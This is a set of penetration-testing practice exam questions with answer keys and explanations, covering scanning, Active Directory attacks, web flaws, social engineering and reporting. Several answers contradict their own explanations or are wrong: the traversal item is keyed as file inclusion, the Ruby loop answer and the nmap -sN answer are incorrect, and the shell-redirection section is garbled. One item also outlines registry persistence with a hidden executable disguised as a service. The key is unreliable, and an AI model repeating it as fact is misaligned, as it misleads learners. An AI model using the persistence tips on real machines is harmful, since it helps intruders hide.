While finalizing a penetration testing report for a customer, you realize that you used several acronyms and technical terms that the audience may not understand. You need to provide explanations for these acronyms and terms. Where should you provide this information?
A.Main body
B.Appendices
C.Technical summary
D.Executive summary
B.Appendices
Explanation:
Explanations of acronyms and technical terms should be provided in the appendices. This ensures that you only have to provide an explanation of the acronyms and terms in a single location. It also ensures that the reader can easily locate the explanations of those acronyms and terms. If you provided those explanations within the text, you may need to explain them multiple times at each mention of the acronym or terms.
The executive summary, main body, and technical summary should not include the explanations of the acronyms and terms.
The executive summary should contain the summary of the penetration test scope and major findings. The technical summary should contain the technical details on the findings of the penetration test. The IT department and technical staff will use the technical summary to help them make decisions on which actions should be taken for mitigation. The main body of the report usually includes the statement of scope, methodologies and tools used, and the details of the findings.
Which of the following items would NOT be included in the rules of engagement for an external penetration test?
A.client contact information
B.network diagram
C.scope of testing
D.sensitive data handling
B.network diagram
Explanation:
In an external test, you are attempting to determine what an attacker with NO information can achieve, so a network diagram would not be provided.
Even if a network diagram may be provided, as in the case of an internal test, it still would not be part of the rules of engagement. More importantly, it’s these rules that identify which parts of the client’s systems are fair game or out of bounds. Specifically, the rules of engagement should include the following:
Scope of testing (which machines, which networks, and what type of testing) Sensitive data handling Client contact information Client IT notifications (Are they aware of the test?) Meeting schedules and procedures Best practices for cleaning up after the tests are concluded
When getting ready to do a vulnerability scan on a network, you need to understand fragile systems and non-traditional items on the network that may be negatively affected when being heavily pinged.
Which of the following items are the most fragile when scanned or attacked? (Choose two.)
A.Cell phones B.Fax machines C.Macs D.IoT E.Printers
D.IoT
E.Printers
Explanation:
Internet of Things (IoT) devices and printers are the most fragile when scanned or attacked. During active scanning on your network, the scan is knocking on all of the port’s doors, which in most devices is ok. Unfortunately, that knocking can cause damage to the more fragile IoT items that aren’t built to take that kind of traffic. For example, when a port scan is initiated against a printer, a large amount of “garbage” will be printed, including seemingly meaningless information outputted from each port as it is scanned. If you are using something like Nessus or another GUI scanner in the same vein, you may get a message similar to the following:
“The remote host appears to be a network printer, multi-function device, or other fragile device. Such devices often react very poorly when scanned.”
IoT devices are usually clumped into a number of devices and aren’t meant to be slammed with scanning techniques.
Cell phones are not considered fragile devices and can be scanned on a Wi-Fi network without the user knowing about it.
Fax machines are not usually connected to the network, but to the phone line. There are ways to attack fax machines, but that is outside the scope of this practice test remediation.
Computers that run macOS are like any other computer. They can be pinged or DoS’d like any other computer without affecting its operation.
A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?
A.Clickjacking
B.Full path disclosure
C.Expired certificate
D.Stored XSS
D.Stored XSS
Explanation:
Stored XSS attacks occur when the malicious code is permanently stored on a vulnerable server, using a database. These attacks are typically carried out on websites (web applications).
Full path disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file (e.g.: /home/omg/htdocs/file/). Certain vulnerabilities, such as using the load_file() (within a SQL injection) query to view the page source, require the attacker to have the full path to the file they wish to view.
Clickjacking, also known as a UI redress attack, is when an attacker uses multiple transparent or opaque layers to trick a user into clicking a button or link on another page when they were intending to click the top level page. Thus, the attacker is “hijacking” clicks meant for their page and routing them to another page, most likely owned by another application, domain, or both.
An expired certificate would alert people going to your website that your website is no longer “secure.” It is not to be prioritized as critical, but definitely in need of correction.
Your goal is to crack a password that is encrypted in the ciphertext format. Which of the following would you use if you wished to crack the password offline?
A.Medusa
B.Hydra
C.John the Ripper
D.Mimikatz
C.John the Ripper
Explanation:
John the Ripper is an extremely popular tool which is used for password cracking. It works offline and uses both search patterns and wordlists to crack passwords. There are many different ciphertext formats the tool understands.
Hydra is an active tool which interacts with the targeted server. It goes down a list of username/password combinations, in an attempt to brute-force its way in. It is best to know information beforehand, such as a username.
Mimikatz retrieves hashed passwords from memory. It is used by both penetration testers, and even malware.
Medusa is a credential brute-forcing tool. It is similar to Hydra.
As you look over your project scope and start to scan the networks, which of the following statements BEST describes a vulnerability in a network that you should watch for?
A.Input that is not tested prior to being processed and let through to the databases
B.A design or implementation flaw that can be exploited
C.A person or group responsible for a security incident
D.Any outside threat to the network
B.A design or implementation flaw that can be exploited
Explanation:
A design or implementation flaw that can be exploited best describes a vulnerability. A vulnerability is a defect or weakness in a particular system, module, or component that leaves it open to being compromised. Vulnerabilities can be compromised by threat actors (such as attackers), disasters (such as unplanned power outages), or accidents (such as human error).
Any outside threat to a network describes a security threat, not a vulnerability. A threat is a possibility of an event (such as an attack or a disaster) that takes advantage of a vulnerability and produces undesirable consequences, such as loss or damage of an asset or the inability to continue providing service to your customers.
Input that is not tested prior to being processed and failing to check security measures are examples of specific vulnerabilities. However, neither is a complete definition of a vulnerability.
A threat actor is a person or group who is responsible for a security incident. They are the ones who can see a flaw in a network device and want to exploit it, in other words, a vulnerability.
On a penetration test of your client’s site, you see a shopping catalog. Upon looking at the pictures of the items in their catalog, you find the address of where the images are located in the web application: /var/coats/images/218.png.
You put that address in your browser’s URL as https://insecure-website.com/var/coats/images/218.png. The image of a coat shows up by itself. You take that image and play with the address to easily allow a certain type of attack to happen. There is no security against this attack in place. What is this attack called?
A.Cookie manipulation
B.Directory traversal
C.Malicious file upload
D.File inclusion
D.File inclusion
Explanation:
This attack is a directory traversal. Directory traversal is a very common attack against sites. It is a real easy way to get around login information or access private galleries, files, or even username and email lists. Frequently this attack requires guessing which subdirectory and/or filename is your target. With some detective work, you can follow the normal file and domain structures that are out there. You can do this attack by using two different methods: the (…/) method or by typing in the absolute path (https://interconn.com/wp-content/uploads/2018/03).
This is not cookie manipulation. Cookies are small pieces of data created and stored in a user’s browser that keeps track of important information regarding the user’s session information for a particular site. Cookie manipulation, also called cookie poisoning, is when a hacker is able to change data within that cookie to take over that user’s information or bypass security measures on websites. This is not the case here as the pen tester was able to see another attack vector and move around the site.
This is not a file inclusion attack. File inclusions themselves are normal, and useful, parts of a server-side scripting language. They are there to help in maintenance, update, and for code-editing. They are there also to allow web applications to pull and read files from the server’s file system.
Local file inclusion (LFI) and remote file inclusion (RFI) are similar to the nefarious cross site scripting (XSS) attacks. All of them are forms of code injection, with LFI being less sophisticated and therefore easily preventable. RFI is a method which allows an attacker to employ a script to include a remotely hosted file on the web server. LFI is very similar to RFI, the only difference being that to carry out the LFI attack, the attacker has to use local files on the current server, and RFI uses remote files. This scenario did not deal with the files on a server but with just changing parts of the web address to move around to areas that an external user wouldn’t normally be able to access.
This is not a malicious file upload attack. If a file upload option exists on a web application without any limiters or certain red flags it watches out for, then an attacker can upload malware right to the server and have a field day.
Which physical security issue can be mitigated with privacy filters?
A.shoulder surfing
B.tailgating
C.piggybacking
D.lock bypass
A.shoulder surfing
Explanation:
Privacy filters fit over a device’s screen and allow for clear viewing of screen content ONLY when the authorized user is directly in front of the screen. This impedes shoulder surfing, which the viewing of screen content from behind a user without the user’s knowledge.
Privacy filters cannot mitigate piggybacking. Piggybacking is a social engineering attack that involves entering a facility which you are not authorized to enter by doing so when an authorized person opens the door using their credentials stored on a key card. It is mitigated by turnstiles or mantrap entries.
Privacy filters cannot mitigate tailgating. Often you will see the terms piggybacking and tailgating used synonymously. However, there is a subtle difference between the two. Piggybacking implies that the person who has opened the door with their credentials knows that individual following him in through the secure door. Tailgating means that an individual following through the door is unknown by the person with credentials
Privacy filters cannot mitigate lock bypass. Lock bypass is a technique where the lock mechanism is never engaged or attacked, rather it is bypassed, for example where one inserts a sprung steel device to retract the spring-loaded catch that restrains the shackle, preventing it from operating. The use of deadbolts in doors helps avoid lock bypass. The locking mechanism and bolt are operated by the key. This prevents the device from being opened without the locking mechanism itself being properly operated.
Given a command: nmap -v -sV -O -sS -T2 192.168.1.1, what is the primary function of the -O switch?
A.OS fingerprinting
B.Ping scan
C.Port selection
D.Service identification
A.OS fingerprinting
Explanation:
The Nmap command -O is used for OS detection/fingerprinting. This is used to determine which operating system the target is using.
The -p command of the Nmap command performs port selection. This is used to specify a port in a scan. The following exhibit shows an example of this command:
The -sV parameter of the Nmap command performs service identification. This gives information on services running, including mail or DNS server services. This could help determine the exploits to which a server could be vulnerable.
The -sN parameter of the Nmap command performs a ping scan. It sends an ICMP echo packet by default. If the target responds, then it is alive. If not, the target is considered offline. The following exhibit shows this command:
You were hired to conduct a penetration test by an organization that employs biometrics as part of their security system. Prior to conducting the test, you were notified that there was a high level of false positives. What part of the biometric system would you focus on first?
A.Biometric algorithm
B.Biometric clipping levels
C.Biometric technology
D.Physical access
A.Biometric algorithm
Explanation:
A high volume of false positives (also known as Type II errors) would indicate an issue with the underlying configuration or mathematical algorithm of the biometric system. It could also mean that the biometric system has been tampered with. The algorithm is tasked with matching the exact, unique features of the user with the backend characteristics stored in the biometric system and also protecting that information. So, a tester would want to start with the algorithm to see if the biometric data can be intercepted and tampered with as it is traveling from the sensor back to the system for verification.
Biometric technology refers to testing the security vulnerabilities in the software application. The main goal is to discover any doorways that may have been left behind intentionally or unintentionally.
Physical access refers to actually testing the systems. A penetration tester can conduct a penetration test in a single sign on environment to determine the effectiveness of a fingerprint recognition system or an iris recognition system.
Clipping levels refer to a threshold that establishes expected user activity. Within the context of biometrics, a clipping level refers to the threshold for unsuccessful authentication attempts. An individual logging into an account should be locked out once the clipping level is met or exceeded, helping prevent against brute force attacks. While the tester would want to evaluate clipping levels, it would not be the first step in this situation.
Which of the following items determines whether an organization must comply with PCI-DSS rules?
A.PINs/PIB blocks B.PAN C.CVV D.Cardholder name E.Expiration date
B.PAN
Explanation:
The treatment of the primary account number (PAN) is the determining factor in whether the Payment Card Industry Data Security Standard (PCI-DSS) applies to an organization. If the PAN is stored, processed, or transmitted, PCI-DSS applies. The PAN must always be stored in an encrypted, unreadable format.
The Payment Card Industry Data Security Standard (PCI-DSS) provides information security standards for organizations that hold financial transaction information, especially credit card data.
The other account data elements are all sensitive and, if also stored or transmitted, must be done so in an unreadable (encrypted) format. These items are:
PAN Cardholder name Expiration date Service code
Sensitive authentication data is considered to be the PINs/PIB blocks, the Card Verification Value (CVV), and the data encoded in the card’s magnetic stripe or chip. The CVV is also referred to as the CAV2, the CID, the CVC2, and the CVV2.
Your network has recently been victim to a number of SQL injection attacks. Management has asked you to implement appropriate remediation to protect against future attacks of this kind. Which one of the following techniques is NOT an appropriate remediation activity in this scenario?
A.Network firewall
B.Input sanitization
C.Input validation
D.Parameterized queries
A.Network firewall
Explanation:
Of the options given, network firewalls generally would not prevent a SQL injection attack.
Input sanitization, input validation, and parameterized queries are all acceptable means for preventing SQL injection attacks.
Input validation checks if the input meets a set of criteria.
Input sanitization takes it a step further. Data sanitization will actually modify the input to ensure it is valid.
Proper secure coding combines these two strategies for defense in depth. For example, you might change all single quotation marks in a string to double quotation marks (sanitize) and then check that all the quotation marks were actually changed to double quotation marks (validate) when the input is reentered into the input field.
Parameterized queries (also known as prepared statements) are typically used to avoid SQL injection attacks. Parameterized queries do proper substitution of arguments prior to running the SQL query. It completely removes the possibility of “dirty” input changing the meaning of your query. That is, if the input contains SQL, it can’t become part of what is executed because the SQL is never injected into the resulting statement.
As a pen tester, you want to tinker with the Windows registry to set up persistent access to a Windows machine. Once this persistent access is enabled, you plan to execute batch files, executables, and even exported functions in DLLs. You currently have limited privileges and need to maintain persistence. Which of the following registry keys should edit to keep your access on this machine? (Choose two.)
A.HKEY_CLASSES_ROOT
B.HKEY_CURRENT_CONFIG
C.HKEY_CURRENT_USER
D.HKEY_LOCAL_MACHINE
C.HKEY_CURRENT_USER
D.HKEY_LOCAL_MACHINE
Explanation:
Current user and local machine are the registry keys you want to play with, and insert code into, to maintain persistence.
While registry key editing is outside the scope of this exam, there is a program for changing ownership of registry keys. Here is an overview of how you can change registry keys. Registry Editor, which most computers have installed by default, allows you to pull up some of the keys, but you can run into some permission issues, even when you are logged in as an admin. (You can sometimes overcome that restriction by right-clicking on the key and changing permissions.)Instead, you should go to: https://www.thewindowsclub.com/regownit-take-full-control-windows-registry-keys to download RegOwnit. Using this program, go to the same location and click on the key. The program will allow you to take ownership of the key, after which you can change the registry.
In terms of changing the registry key, it could be as easy as demonstrated in the exhibit, in which we are just adding in a call to a hidden executable code: C:\Our\Mostest\Evil\Binary.exe.
Part of hiding this is after using the above permissions work-around, if needed, is using SVCHOST.exe and using a “genuine service name” and a service.dll to run their edited registry. This will make it hard to know you are still hiding in the system.
HKEY_CURRENT_USER, often called HKCU, is part of a major group of registry keys called a registry hive. It is also a major part of the Window operating system configuration. This key holds all of your user configuration information for your profile, including wallpaper, installed printers, display settings, networked drives, and other environmental variables we take for granted when we log in.
HKEY_LOCAL_MACHINE (or HKLM) contains the majority of the configuration information for the software you have installed, as well as for the Windows operating system itself. In addition to software configuration data, the HKEY_LOCAL_MACHINE hive also contains lots of valuable information about currently detected hardware and device drivers.
HKEY_CLASSES_ROOT, often shortened to HKCR, is basically a function that kicks in when you ask your computer to do something. It then pulls the necessary DLLs from its group and does a thing. This will not really help with persistence.
HKEY_CURRENT_CONFIG, sometimes shortened to HKCC, does not store any information itself but instead acts as a pointer, or a shortcut, to a registry key that keeps information about the hardware profile currently being used.
Which of the following factors, when present, does NOT enhance an interrogator’s ability to extract information from a user?
A.affiliation
B.criticism
C.intimidation
D.urgency
B.criticism
Explanation:
Criticism typically does not enhance an interrogator’s ability to extract information from a user. On the contrary, flattery and compliments tend to work in getting a user to open up.
Intimidation does work well. When someone fears an unpleasant outcome if they do not cooperate, it causes many of them to do so.
Creating a sense of urgency to a situation also can help to move a user to act when they would not otherwise.
Creating a sense of affiliation with the user also helps. One is usually more open with someone who shares their interests.
While performing a penetration test, you discover that attackers have been trying to hack into the company’s e-commerce server for several weeks. None of the attacks have been successful.
What should you do?
A.Only include the finding in the final report.
B.Only report the issue to the appropriate personnel.
C.Immediately report the issue to the appropriate personnel, and include the finding in the final report.
D.Do nothing. This issue is not a valid finding because vulnerabilities with the server were not discovered.
C.Immediately report the issue to the appropriate personnel, and include the finding in the final report.
Explanation:
You should immediately report the issue to the appropriate personnel and include the finding in the final report. This will ensure that the organization is aware of the threat against the e-commerce server.
You should not only include the finding in the final report. Although this is not an indicator of compromise (because the attacks have not been successful) or a critical finding, it is still important that you immediately contact the appropriate personnel. While the attack may not have been successful, it is likely that the attackers will continue until they are able to break into the system. Situational awareness is important when conducting penetration testing and this is a perfect example of situational awareness.
You should not only report the issue to the appropriate personnel. This incident should also be included in the final report.
You should not do nothing. This is a valid finding. Although the attack has not been successful yet, it is likely that eventually the attack will be successful. By notifying the appropriate personnel and including the finding in the final report, you ensure that the organization is aware of the threat.
During the penetration testing planning session, the organization has decided to use CVSS scores to help determine the criticality of any discovered vulnerabilities. Which one of these CVSS groups does NOT receive a score in the CVSS system?
A.Base
B.Security
C.Environmental
D.Temporal
B.Security
Explanation:
An overall Common Vulnerability Scoring System (CVSS) score is generated using three group scores:
Base group: represents characteristics of a vulnerability that are constant over time and do not depend on the environment. Temporal group: assesses a vulnerability as it changes over time. Environmental group: represents the characteristics of a vulnerability, taking into account the organizational environment.
There is no Security group in the CVSS system.
During a pen test, you extract service account credentials from Active Directory as a user without sending any packets to the target system, thereby bypassing any suspicion. Which type of attack is this?
A.VPN pivoting
B.PsExec
C.Golden ticket
D.Kerberoasting
D.Kerberoasting
Explanation:
This is a Kerberoasting attack. Kerberos authentication is a rabbit hole in and of itself. Kerberos has three components:
The client The server The Key Distribution Center (KDC)
The KDC is usually a trusted third party, so you get the ticket-granting ability, or Ticket Granting Ticket (TGT), from the KDC. To do so, you present authoritative documentation saying you can gain access to the resource server.
The Kerberoasting attack is performed by requesting a Kerberos service ticket for the Service Principal Name (SPN) of our target. The domain controller looks up that SPN and then encrypts the ticket for that SPN to allow us access to that SPN. The encryption type is RC4_HMAC_MD5, which means the service account’s NTLM password hash is used for the encryption. When you crack that encryption, you then have full access. Plus, you can ask for as many tickets you want and just keep cracking encryption.
This is not a golden ticket attack. Yes, golden tickets can grant administrative access to Active Directory (AD) domains through Kerberos authentication. A golden ticket could be the next level in attacking that server, due to it being a step beyond our Kerberoasting attack. It is more the process of maintaining access to the compromised server that has been providing tickets. If an attacker retrieves the hash from the AD data store, the attacker can create a golden ticket and compromise any number of domain members, even domain controllers.
This scenario does not describe virtual private network (VPN) pivoting. In VPN pivoting, an attacker runs a VPN client on a compromised host and relays all internal traffic to the VPN server running on the attacker’s remote machine.
This scenario does not describe PsExec. PsExec is a simple and more robust alternative to Telnet and SSH that is used to manage remote Windows systems. Once a user’s credentials are compromised, an attacker can simply use this single executable on a target system to authenticate with the compromised credentials to other systems, or to run a malicious file and gain administrative access.
Which risk management process involves doing nothing to prevent a specific risk from occurring?
A.Transference B.Avoidance C.Reduction D.Sharing E.Acceptance
E.Acceptance
Explanation:
Risk acceptance or risk tolerance is the act of choosing to leave a risk as it is, without implementing any countermeasures. A risk may be accepted when any damage caused by the risk would be easily absorbed, or when the available countermeasures for the risk are too cost-prohibitive to use.
Risk avoidance is a risk mitigation technique. By altering or stopping the business activity that generates the risk, the organization hopes to prevent the risk from occurring. It is not always practical to stop or change a business activity if the organization hopes to achieve its business goals. More commonly, organizations will choose to accept or to mitigate the risk.
Risk reduction involves using countermeasures to lessen the impact or probability of a risk. Risk reduction can use offensive or defensive controls. Offensive controls are proactive attempts to remove threats, such as applying a security patch or hardening servers. Defensive controls are attempts to respond to threats, such as installing an intrusion detection system (IDS).
Risk transference moves the responsibility for the risk to another entity, such as an insurance agency.
Risk sharing spreads the impact of the risk to another entity, such as hiring an outside firm with their own liability insurance to provide cybersecurity for your organization. However, organizations governed by such laws as GLBA, PCI-DSS, and HIPAA / HITECH cannot transfer away the risk of non-compliance. In other words, a company that must comply with HIPAA can contract an outside firm to ensure they are in compliance, but non-compliance will always be the fault of the parent company and not the contractor.
Which risk management process involves doing nothing to prevent a specific risk from occurring?
A.Transference B.Avoidance C.Reduction D.Sharing E.Acceptance
E.Acceptance
Explanation:
Risk acceptance or risk tolerance is the act of choosing to leave a risk as it is, without implementing any countermeasures. A risk may be accepted when any damage caused by the risk would be easily absorbed, or when the available countermeasures for the risk are too cost-prohibitive to use.
Risk avoidance is a risk mitigation technique. By altering or stopping the business activity that generates the risk, the organization hopes to prevent the risk from occurring. It is not always practical to stop or change a business activity if the organization hopes to achieve its business goals. More commonly, organizations will choose to accept or to mitigate the risk.
Risk reduction involves using countermeasures to lessen the impact or probability of a risk. Risk reduction can use offensive or defensive controls. Offensive controls are proactive attempts to remove threats, such as applying a security patch or hardening servers. Defensive controls are attempts to respond to threats, such as installing an intrusion detection system (IDS).
Risk transference moves the responsibility for the risk to another entity, such as an insurance agency.
Risk sharing spreads the impact of the risk to another entity, such as hiring an outside firm with their own liability insurance to provide cybersecurity for your organization. However, organizations governed by such laws as GLBA, PCI-DSS, and HIPAA / HITECH cannot transfer away the risk of non-compliance. In other words, a company that must comply with HIPAA can contract an outside firm to ensure they are in compliance, but non-compliance will always be the fault of the parent company and not the contractor.
Your company uses scheduling to automatically run tasks with different permission sets or to trigger a task using events or at specific time intervals. However, you are concerned that an attacker can schedule a backdoor script to run and open a way into a victim’s Windows computer. You want to search the Task Scheduler on Windows computers to see if a backdoor is being run.
Which command would allow you to check if the backdoor is scheduled to run? A.mstask B.LaunchD Task Scheduler C.schtasks D.crontab -e
C.schtasks
Explanation:
The schtasks.exe command allows a user to create, delete, and search scheduled tasks on a remote or local computer. Just typing in schtasks will show you the current status and next run time for all scheduled events, as seen below:
It is not LaunchD Task Scheduler. This program creates the job for launchd, which is an Apple user daemon, to schedule. We are using the Windows operating system for this scenario.
It is not crontab -e. The cron function in Linux acts like the task scheduler function in the Windows operating system. We are using the Windows operating system for this scenario, not Linux.
It is not mstask.exe, unless you are on an older machine (Win95 through WinMe). The versions of Windows which use this command are no longer supported and should not exist in any enterprise.
What kind of scan if this?
‘nmap -sT -A -v 192.168.1.0/24’
A.Stealth Scan
B.Compliance Scan
C.Discovery Scan
D.Full Scan
D.Full Scan
Explanation:
You performed a full scan with the addition of the -A switch. This option enables OS detection, version detection, script scanning, and traceroute.
The -sT switch is one of the most basic, but very good, Nmap scans. It is one of the two TCP connect scans, along with -sS (which is a stealth scan). This is a TCP scan as it is connection-oriented scan. Thus, it sends a connection call to the port. If it receives back an OK it logs the port as Open. IF it does not receive back a response, it calls the port Closed and moves on. This scan is pretty basic, but a good and very functional scan on the network.
A stealth scan is not going to be as loud as a ping scan. You need to be very careful when performing a ping scan. A stealth scan is going use the -sS switch and is just going to quietly poke around and see what ports are open on a host or hosts.
A discovery scan most often uses the -sn switch and will show you a list of hosts that are open now, but not ports. This type of scan is used more for seeing what is out there in the network. There are several different discovery scans you can perform, which use the following switches:
- sn (no port scan)
- sL (list scan)
- Pn (no ping)
- PS (port list TCP version)
- PU (port list UDP version)
Compliance scans, by their very nature, are interested in whatever compliance rules your company needs to follow. For instance, if you are a hospital or medical clinic, you need to be in compliance with HIPAA.
You are a Linux system administrator. You have automated a process, and you want all of the output and error logs to be recorded in a file without your intervention. Which of these following operators will you use?
A.&>
B.|
C.<
D.>
A.&>
Explanation:
The &> operator directs both output and error streams to a file.
In Linux, input streams provide input to programs and output streams usually print text characters to the terminal (computer monitor). You use the > or»_space; operators to direct output to a file. The > symbol creates a file containing the standard output. The»_space; symbol appends an existing file with the standard output. For example, the following command will write the echoed message to the File1 file:
$ echo “Write”>File1
The > character in the echo command above is called a file descriptor. If File1 already exists, the command will overwrite it. If you want to prevent files from being overwritten, you need to set the noclobber option of the shell:
$ set -o noclobber
The < operator redirects standard input from a file onto the screen. The following command uses the tr command to replace spaces in the File1 file with tabs, and displays the output on screen using the < operator:
$ tr ‘ ‘ ‘\t’&1 |sort
A sample output of this command is as follows:
File1
File2
File3
Northern Company is conducting an annual penetration test across its ICS/SCADA network systems. Which testing method would you use to conduct a configuration review?
A.SCADA testing
B.White box testing
C.Black box testing
D.Gray box testing
D.Gray box testing
Explanation:
Gray box testing provides a more focused and efficient assessment of a network security. There are several types of grey box testing.
Matrix Testing: This testing technique involves defining all the variables that exist in their programs. Regression Testing: This testing technique checks whether the change in the previous version has regressed other aspects of the program in the new version. It will be done by testing strategies like retest all, retest risky use cases, retest within a firewall Orthogonal Array Testing or OAT: It provides maximum code coverage with minimum test cases Pattern Testing: This testing is performed on the historical data of the previous system defects. Unlike black box testing, gray box testing digs within the code and determines why the failure happened.
Black box testing provides a very limited amount of information to the tester and carries a high risk that the systems can crash during the test. This type of testing is based entirely on software requirements and specifications. In black box testing, the pen tester just focuses on the inputs and output of the software system without bothering about internal knowledge of the software program.
White box testing is very time-consuming and expensive. It identifies as many security holes as possible. It is the testing of a software’s internal structure. Its primary focus is to verify the flow of inputs and outputs through an application, improving a design and usability, or strengthening security. It includes looking for internal security holes, broken or poorly structured paths in the coding processes, the flow of specific inputs through the code, expected output, the functionality of conditional loops, and the testing of each statement, object, and function on an individual basis.
Supervisory Control and Data System (SCADA) is not a method used for configuration review. SCADA systems are used to monitor and control a plant or equipment in industries such as telecommunications, water and waste control, energy, oil and gas refining and transportation. It allows industrial organizations to control industrial processes locally and remotely and monitor, gather, and process real time information.
Which of the following is an open-source fuzzer created by Cisco?
A.Recon-ng
B.Mutiny Fuzzing Network
C.Peach
D.AFL
B.Mutiny Fuzzing Network
Explanation:
Mutiny Fuzzing Framework is an open-source fuzzer created by Cisco. It functions by replaying pcaps through a mutational fuzzer.
The answer is not the American Fuzzy Lop (AFL). That is a free fuzzing tool which aims to improve the functional coverage of test cases.
The answer is not Peach. Peach is a popular fuzzer. It is open source and is available in both a community and commercial version.
The answer is not Recon-ng. It is a tool which comes with Kali Linux. It is used to automate the information gathering of Open Source Intelligence (OSINT).
Users are reporting that a server is responding slowly and not accepting new connections. You suspect that the server is experiencing a DoS attack. Which network traffic would indicate this attack? (Choose all that apply.)
A.Excessive SYN packets
B.Malformed packets
C.Replay packets
D.Excessive ICMP ping packets
A.Excessive SYN packets
B.Malformed packets
Explanation:
Both malformed packets and excessive SYN packets would indicate that a denial of service (DoS) is being experienced by the server. A SYN flood attacks a victim by flooding the victim with an overwhelming amount of SYN packets to saturate the connection bandwidth of the targeted system. The attacker never sends the final ACK packet, and the receiving system crashes due to the amount of half open connections.
A malformed packet is also an indication of a DoS attack because a receiving machine (especially an older one) typically has trouble handling and reassembling fragmented or malformed packets. Older machines (such as those running Windows 7) cannot reassemble malformed packets in the proper order, effectively crashing the system.
Replay packets or a replay attack occurs when data is maliciously re-transmitted by an attacker. The attacker would need to have access to the network data. In order to do so, the attacker would need to physically tap into the network, or sit in the middle and spy (which would be considered ARP poisoning) in order to steal the victims information.
ICMP and ping packets are related to a smurf attack, which is a form of a DoS attack. However, the indication of a DoS attack would be a large, malformed ping packet or an ICMP echo request sent to a directed broadcast address, rather than a large number of ping packets.
Which of the following considerations is the MOST important with regards to penetration testing reports?
A.security
B.distribution
C.accuracy
D.readability
A.security
Explanation:
Penetration testing reports that detail the vulnerabilities that have been found could be used as an attack plan if the report fell into the wrong hands. For this reason, securing these documents is critical.
Accuracy of the reports is important, but the confidentiality of the reports is more important.
Readability is also important, especially with regard to the target audience, but the confidentiality of the reports is more important.
The distribution of the list is important in that it keeps key stakeholders updated, but the confidentiality of the reports is more important.
You discover the following Ruby script:
a_number = 100
loop do
a_number = a_number - 3
next if a_number % 2 == 0
puts “#{a_number}”
break if a_number <= 0
end
What number will be printed first?
A.100
B.97
C.98
D.94
D.94
Explanation:
The number that will be printed first based on this script is 94. In this script, the variable, a_number, has a value of 100 before it enters the loop. After entering the loop, a_number decreases by 3 (97) and enters a conditional if statement.
Because a_number has a remainder when dividing by 2 (48.5), it will skip the put statement. a_number is not less than 0, so it begins the loop again by subtracting 3 from a_number. The variable now has a value of 94, which has a remainder of 0 when dividing it by 2.
This will cause the system to print out 94.
A network security analyst is performing a vulnerability scan and gathering information on network hosts. They want to use ICMP traffic to determine whether a host is online and responsive. Which of the following Nmap commands would produce these results?
A.-sT
B.-sF
C.-sN
D.-sU
C.-sN
Explanation:
A ping scan (-sn) sends an ICMP echo request packet to the target. If the target responds to the ICMP echo reply, then it is considered alive and responsive.
A UDP scan (-sU) is used when scanning for a UDP ports if you are trying to enumerate a DNS, SNMP, or DHCP server.
A TCP connect scan (-sT) makes use of the underlying operating systems networking mechanism to establish a full TCP connection with the target device.
A TCP FIN scan (-sF) sets only the FIN flag on a packet. This type of scan determines if a target system’s ports are open or closed, and has the added benefit of being stealthier than a TCP connect scan.
At InterConn, you ran an Nmap scan. In that scan you discover vsftpd running.
You run a Metasploit scanner, which returns the following results:
msf > use auxiliary/scanner/ftp/anonymous
msf auxiliary (scanner/ftp/anonymous) > set RHOSTS 172.16.16.20
RHOSTS => 172.16.16.20
msf auxiliary (scanner/ftp/anonymous) > exploit
[+] 172.16.16.20:21 - 172.16.16.20:21 - Anonymous READ (220 (vsFTPd 3.0.3))
[] Scanned 1 of 1 hosts (100% complete)
[] Auxiliary module execution complete
What options below would you recommend as BEST PRACTICES that InterConn should do to fix this vulnerability? (Choose all that apply.)
A.Require re-authentication of inactive sessions
B.Lock down administration accounts
C.Use strong passwords and multi-factor authentication
D.Encrypt all files stored in the FTP server
E>Return any modified systems and their configuration to their original values and parameters
F.Restrict administrator privileges to a limited number of users and required them to use multifactor authentication
A.Require re-authentication of inactive sessions
B.Lock down administration accounts
C.Use strong passwords and multi-factor authentication
D.Encrypt all files stored in the FTP server
F.Restrict administrator privileges to a limited number of users and required them to use multifactor authentication
Explanation:
The following answers are best practices to lock up your FTP server:
Use strong passwords and multi-factor authentication. A best practice is to use good credential management and strong passwords. When possible, use two-factor authentication for any critical service or server. Encrypt all files stored in the FTP server. If someone does get in, it is more work to find out what is in there. Require re-authentication of inactive sessions. Believe it or not, you can sometimes bring back “closed sessions” that weren’t logged out of as you thought. You can do this in web browsers on public computers as well. Please make sure you log out of Facebook on a public computer! Lock down administration accounts. You should restrict administrator privileges to a limited number of users and require them to use multi-factor authentication. In addition, do not use common administrator usernames such as root or admin.
Returning any modified systems and their configuration to their original values and parameters may sound correct, but you actually want to patch and modify your parameters in an FTP server to keep cyber criminals out. Leaving things in a default setting is what let the anonymous login happen in the first place.
Which of the following is NOT a major concern with IoT device updates?
A.Hashed update files
B.Unsigned updates
C.Updates sent encrypted
D.Lack of update mechanism
A.Hashed update files
Explanation:
Hashing an update file is actually a way to ensure and prove that updates come from a reliable, trusted source. The device manufacturer will provide the update along with a hash of the file. Before installing the update, the receiving party will validate the update file by comparing hashes.
The other choices are major concerns that prevent updates from being installed properly or may lead to fake, malicious files being downloade
During a pen test, one of the testers convinced a user that they were calling from the police and needed immediate access to their email account and that failure to do so could implicate them in a crime.
Which techniques were used to accomplish this? (Choose two.)
A.scarcity B.fear C.authority D.social proof E.urgency
B.fear
C.authority
Explanation:
The two techniques that were used are authority (pretending to be police) and fear (threat of implication). When faced with these techniques, users will often forget all training and cooperate.
The technique of scarcity was not used. An example of this would be to tell someone that there are a limited number of users who can be a part of a test group. It works because people do not like to feel as though they missed an opportunity for something free.
The technique of social proof was not used. This technique leverages the “follow the herd” mentality. For example, a hacker might say that several coworkers have already responded favorably to the hacker, leading the user to assume that MUST be the appropriate response.
The technique of urgency was not used. If the hacker added that the user had 15 minutes to respond, then urgency would have been used.
What tool was primarily designed to brute force both directory and file names on web application servers?
A.W3AF
B.Nikto
C.OWASP ZAP
D.Nessus
C.OWASP ZAP
Explanation:
OWASP ZAP is correct. Actually, originally, Dirbuster was primarily designed to brute force both directory and file names on web application servers. However, it is an inactive project and has been integrated into OWASP’s ZAP.
The answer is not Nikto. Nikto is an open source web vulnerability scanner.
The answer is not Nessus. Nessus is a vulnerability scanner developed by Tenable. It has many features compared to other scanners, including continuous monitoring and compliance analysis.
The answer is not W3AF. W3AF is a web application vulnerability scanner. It is open source and has many available plugins.
